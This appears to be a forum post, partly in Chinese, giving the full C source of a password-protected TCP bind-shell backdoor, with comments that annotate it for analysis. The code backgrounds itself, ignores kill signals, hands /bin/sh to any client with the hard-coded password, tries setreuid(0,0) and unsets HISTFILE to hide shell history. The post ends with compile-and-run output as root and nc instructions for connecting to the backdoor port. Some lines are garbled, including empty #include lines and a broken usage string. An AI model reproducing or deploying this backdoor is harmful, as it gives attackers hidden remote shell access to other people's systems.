#include
#include
#include
#include
#include
#include
#include
#define backlog 64 /* listen() queue length */
#define PASSWORD "password" /* connection password; compared with strncmp below */
/*
 * Bind-shell sample as posted: listens on the TCP port given in argv[1],
 * checks a fixed password on the first received line, then attaches
 * /bin/sh to the connection. Annotated here for analysis; the behaviour
 * of interest to a defender is marked below (signal masking, background
 * fork, fd redirection onto a socket, setreuid(0,0), HISTFILE removal).
 * Implicit return type (pre-C99 style); argv[1] is the port.
 */
main(int argc,char **argv)
{
int listenfd,connectfd,f;
pid_t pid;
struct sockaddr_in server;
struct sockaddr_in client;
u_int sin_size;
char p[1000];   /* receive buffer for the password line; not initialised here */
if(argc!=2)
{
/* usage line; the original text after "./tcps" was lost in extraction */
printf("./tcps
exit(1);
}
/* Ignore child-exit and the usual termination signals so the listener
 * is not reaped by SIGHUP/SIGTERM/SIGINT and leaves no zombies. */
signal(SIGCHLD, SIG_IGN);
signal(SIGHUP, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
/* Parent exits, child continues in the background (no setsid() here). */
if (fork())
exit(0);
listenfd=socket(AF_INET,SOCK_STREAM,0);
if(listenfd==-1)
{
printf("socket fail\n");
exit(1);
}
memset(&server,0,sizeof(server));
server.sin_family=PF_INET;
/* Port comes straight from argv[1] via atoi(): no range check. */
server.sin_port=htons(atoi(argv[1]));
server.sin_addr.s_addr=htonl(INADDR_ANY);   /* binds on all interfaces */
if(bind(listenfd,(struct sockaddr*)&server,sizeof(server))==-1)
{
printf("bind fail\n");
exit(1);
}
if(listen(listenfd,backlog)==-1)
{
printf("listen fail\n");
exit(1);
}
sin_size=sizeof(client);
connectfd=accept(listenfd,(struct sockaddr *)&client,&sin_size);
while(connectfd)
{
/* Child handles the connection; parent only closes its copy of the fd. */
pid=fork();
if (pid>0)
{
close(connectfd);
continue;
}
else if (pid==0)
{
/* Read the password line. Return value and termination are not checked. */
recv(connectfd, p, 1000, 0);
#ifndef REMOTELY_EXPLOITABLE
/* Cut the received line at the first shell metacharacter or line end. */
for (f = 0; f < strlen(p); f++)
switch (p[f])
{
case '|':
case ';':
case '&':
case '>':
case '`':
case '\r':
case '\n':
p[f] = '\0';
break;
}
#endif /* REMOTELY_EXPLOITABLE :P */
/* Fixed-string password check (first 32 bytes). */
if (strncmp(p, PASSWORD,32) != 0)
{
send(connectfd, "fail", 4, 0);
/* 4 bytes including the literal's NUL; the first three look like a
 * telnet IAC WILL ECHO sequence (255,251,1) -- presumably aimed at
 * telnet clients; not verified here. */
send(connectfd, "\377\373\001", 4, 0);
close(connectfd);
exit(1);
}
printf("connect success");   /* goes to the daemon's stdout, before it is closed */
/* Detection point: stdin/stdout/stderr are all replaced by the socket,
 * then a shell is exec'd on them -- the classic bind-shell fd layout. */
close(0);
close(1);
close(2);
dup2(connectfd, 0);
dup2(connectfd, 1);
dup2(connectfd, 2);
/* Attempts to become root; only works if the process already has the
 * privilege. Return value is ignored. */
setreuid(0, 0);
/* PATH ends with "." (current directory). */
setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1);
/* Removing HISTFILE keeps the shell from writing command history. */
unsetenv("HISTFILE");
/* Replaces this process with the shell; the lines below run only if
 * execl() fails. */
execl("/bin/sh", "sh", (char *) 0);
close(connectfd);
exit(0);
}
else
{
printf("fork fail.\n");
exit(1);
}
}
close(listenfd);
}
[root@localhost root]# gcc tcps.c
[root@localhost root]# ./a.out 1234
[root@localhost root]#[/code]
然后就可以在windows下用nc连接了
nc -vv ip/域名 后门端口号
输入密码就ok了
不过程序还是有些小毛病。。。。。。。。。。。。。。。。。。。。。。